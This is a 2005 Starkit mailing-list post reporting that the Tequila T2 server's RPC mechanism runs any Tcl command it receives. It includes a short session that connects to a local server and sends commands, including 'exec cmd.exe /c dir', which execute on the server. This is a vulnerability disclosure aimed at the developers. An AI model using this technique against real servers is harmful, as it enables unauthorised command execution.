[Starkit] Tequila T2 ?'s
Brian Theado
brian.theado at gmail.com
Tue Jun 7 15:09:43 CEST 2005
On 6/7/05, Mark Roseman <mark at markroseman.com> wrote:
>
> While T2 is a great move forward (IMNSHO) from T1, there are still
> some bumps in the road to smooth out.
One of the bumps appears to be security issues. It looks to me like
the tequila server allows any Tcl command to be sent through its rpc
mechanism.
Example:
In one window:
tclkitsh tequila.kit server
In another:
tclktish
% source tequila.kit
% source tequila.kit/t2.tcl
% package require tequila
2.02
% set c [tequila::rpc 127.0.0.1 18396]
rpc0
% $c send puts hi
% $c send puts [glob *]
% $c send puts [exec cmd.exe /c dir]
% exit
In all calls to send, the first window shows that all the commands run
without complaint.
sdx version tequila.kit:
2005/03/15 15:47:19 14876-12477 tequila.kit
Brian
More information about the Starkit
mailing list